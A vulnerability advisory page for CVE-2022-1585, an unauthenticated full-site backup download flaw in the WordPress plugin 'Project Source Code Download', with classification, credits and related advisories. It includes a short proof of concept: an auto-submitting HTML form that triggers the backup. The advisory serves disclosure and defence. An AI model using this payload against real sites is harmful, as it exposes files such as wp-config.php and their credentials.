WordPress Plugin Vulnerabilities

Project Source Code Download <= 1.0.0 - Unauthenticated Backup Download

Description

The plugin does not protect its backup generation and download functionalities, which may allow any visitors on the site to download the entire site, including sensitive files like wp-config.php.

Proof of Concept

<form id="test" action="https://example.com/wp-admin/" method="POST">
    <input type="text" name="create" value="Project source code download">
</form>
<script>
    document.getElementById("test").submit();
</script>

Affects Plugins

Plugin icon
project-source-code-download
No known fix

References

CVE
CVE-2022-1585

Classification

Type
FILE DOWNLOAD
OWASP top 10
A1: Injection
CWE
CWE-552
CVSS
8.2 (high)

Miscellaneous

Original Researcher
Daniel Ruf
Submitter
Daniel Ruf
Submitter website
https://daniel-ruf.de
Verified
Yes
WPVDB ID
e709958c-7bce-45d7-9a0a-6e0ed12cd03f

Timeline

Publicly Published
2022-07-11 (about 1 years ago)
Added
2022-07-11 (about 1 years ago)
Last Updated
2023-04-11 (about 1 years ago)

Other

Published
Title
Published
2022-09-19
Title
Download Monitor < 4.5.98 - Admin+ Arbitrary File Download
Published
2022-12-12
Title
Wholesale Market < 2.2.1 - Unauthenticated Arbitrary File Download
Published
2022-08-17
Title
All-in-One Video Gallery 2.5.8 - 2.6.0 - Unauthenticated Arbitrary File Download & SSRF
Published
2021-08-31
Title
DZS Zoomsounds < 6.50 - Unauthenticated Arbitrary File Download
Published
2022-01-10
Title
SEUR Oficial < 1.7.2 - Admin+ Arbitrary File Download